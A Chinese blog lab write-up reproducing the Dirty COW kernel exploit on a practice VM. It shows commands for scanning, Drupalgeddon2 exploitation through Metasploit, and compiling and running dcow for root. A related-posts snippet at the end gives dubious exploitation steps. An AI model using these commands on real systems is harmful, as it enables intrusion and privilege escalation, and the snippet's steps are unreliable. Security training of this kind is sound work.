脏牛漏洞(CVE-2016-5195)复现过程(详细完整版)

于 2024-01-19 17:03:41 发布
阅读量1.4k 收藏 21
点赞数 20
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/135702390
版权

1、实验环境

  KaLi  攻击机

  Linux靶机  靶场

实验目的:

  掌握漏洞利用的方法

  掌握脏牛漏洞的原理

  提高对内核安全性的认识

2、靶场搭建

VMware导入靶场

靶场地址:链接:百度网盘 请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,支持教育网加速,支持手机端。注册使用百度网盘即可享受免费存储空间icon-default.png?t=N7T8https://pan.baidu.com/s/10RcxsB4LH-41syPxAHcjVg?pwd=jve5

提取码:jve5

3、实验步骤

3.1、查看自己网卡信息

ip a

nat模式下的网卡,与靶机保存一致

3.2、主机发现

查找目标IP,发现144的IP地址

arp-scan -l

3.3、端口扫描

对144进行全端口扫描,发现开放22、80、1898端口

nmap -p- 192.168.188.144

3.4、漏洞利用

主要目的是复现脏牛漏洞,就不说渗透的具体细节了

使用Google插件Wappalyzer发现1898端口是DrupalCMS

使用msfconsole的search功能搜索该cms的历史漏洞

使用 exploit/unix/webapp/drupal_drupalgeddon2 模块进行攻击

查看配置信息,需要配置目标主机和端口

use exploit/unix/webapp/drupal_drupalgeddon2 利用指定模块的漏洞

show options 显示模块选项

set rhosts 192.168.188.144(目标机ip) 配置ip

set rport 1898 配置端口

run 运行

成功获取与目标的会话

发现是www权限,尝试提权

3.5 、进行提权

1、首先进行信息收集

上传linux漏洞检测脚本到/tmp目录下

upload /root/tools/linux提权工具/linux-exploit-suggester-master/linux-exploit-suggester.sh /tmp/

2、赋予执行权限,执行脚本,进行漏洞检测

3、发现存在脏牛漏洞

4、上传exp提权工具

ctrl+c 退出shell会话框

上传exp到靶机/tmp目录

5、提权利用

重新进入shell会话模式,并编译exp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp –lutil

注释:

g++:GNU 编译器集合中的 C++ 编译器。

-Wall:启用所有常见的警告信息。

-pedantic:更严格地遵循标准,发现一些非标准的用法。

-O2:启用优化级别 2,进行中级优化。

-std=c++11:使用 C++11 标准进行编译。

-pthread:启用 POSIX 线程支持。这对于使用多线程的程序是必要的。

-odcow:指定输出文件的名称为 dcow。

dcow.cpp:源代码文件的名称。

-lutil:链接 libutil 库。这是一个 POSIX 实用工具库,可能包含一些与系统操作相关的功能。

命令尽量手敲,复制粘贴容易报错。(不知道原因)

使用python开启一个交互式的shell虚拟终端

python -c 'import pty; pty.spawn("/bin/bash")'

运行脚本尝试提权

成功提权,自此提权完成

白冷
关注
  • 20
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DirtyCow(脏牛漏洞复现
Brucetg的博客
08-20 2万+
该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521 这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子...
Linux(CVE-2016-5195)Dirty cow漏洞利用提权
最新发布
m0_73927535的博客
06-04 508
1、虚拟机 环境2、下载后解压 ,虚拟机打开二、信息收集1、查看kali本机IP<192.168.209.152>,进行本网段扫描2、扫描到有一个IP<192.168.209.154>,这个就是同网段靶机的IP。3、 扫描端口,发现开放了三个端口4、访问1898端口,本机或kali访问都可以。
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
DirtyCow-EXP:编译好的脏牛漏洞CVE-2016-5195)EXP
05-16
DirtyCow-EXP 编译好的脏牛漏洞CVE-2016-5195)EXP,分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考:
脏牛漏洞合集
SHELLCODE_8BIT的博客
12-22 422
9.CVE-2016-5195(脏牛)内核提权漏洞分析 - bmjoker - 博客园 JenI's Blog (jenisec.org) CVE-2016-5195/dcow.cpp at master · gbonacini/CVE-2016-5195 · GitHubLinux提权—脏牛漏洞(CVE-2016-5195)_谢公子的博客-CSDN博客_脏牛漏洞
深度分析“大小脏牛漏洞CVE-2016-5195CVE-2017-1000405
VN520的博客
08-18 724
脏牛漏洞(CVE-20165195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞
CVE-2018-3191利用exp
01-08
压缩包中的"CVE-2018-3191利用exp"可能包含了利用这个漏洞的具体exploit代码或详细步骤,这对于研究漏洞、测试防御措施或进行应急响应都是很有价值的资源。然而,需要注意的是,这类工具和信息必须谨慎处理,避免在...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
**CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞详解** Oracle WebLogic Server 是一款由美国Oracle公司推出的Java EE架构应用服务器,它提供了用于开发、集成、部署和管理大型分布式Web应用、网络应用...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
dirtycow 脏牛漏洞复现 (CVE-2016-5195)
box
10-29 1025
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
脏牛漏洞复现(CVE-2016-5195)
xiaolong22333的博客
09-10 680
脏牛漏洞可以让低权限的用户通过该漏洞完成本地提取 内核版本>=2.6.22 查看内核版本 uname -r 此时还是普通用户 exp地址 https://github.com/gbonacini/CVE-2016-5195.git 上传exp 编译 make 此时会生成可执行文件 执行就会返回root权限的shell ./dcow -s ...
脏牛提权漏洞复现CVE-2016-5159)
1匹黑马
02-22 1457
文章目录影响范围危害漏洞原理漏洞利用 影响范围 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日前所有发行版本) 危害 普通权限用户执行编译后的exp直接提权成root用户 漏洞原理 get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区...
漏洞复现- - -CVE-2016-5195 Dirty Cow脏牛提权漏洞
weixin_67503304的博客
11-02 4599
本文主要讲解了脏牛漏洞的提全过程及其修复建议。
linux “大脏牛漏洞分析(CVE-2017-1000405)
whatday的专栏
10-16 5142
一、背景简介 脏牛漏洞(CVE-20165195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞...
脏牛Dirty漏洞复现
Polemo的博客
03-27 1981
漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改s...
Linux提权一脏牛漏洞(CVE-2016-5195)复现
07-28
你好!对于Linux提权的脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值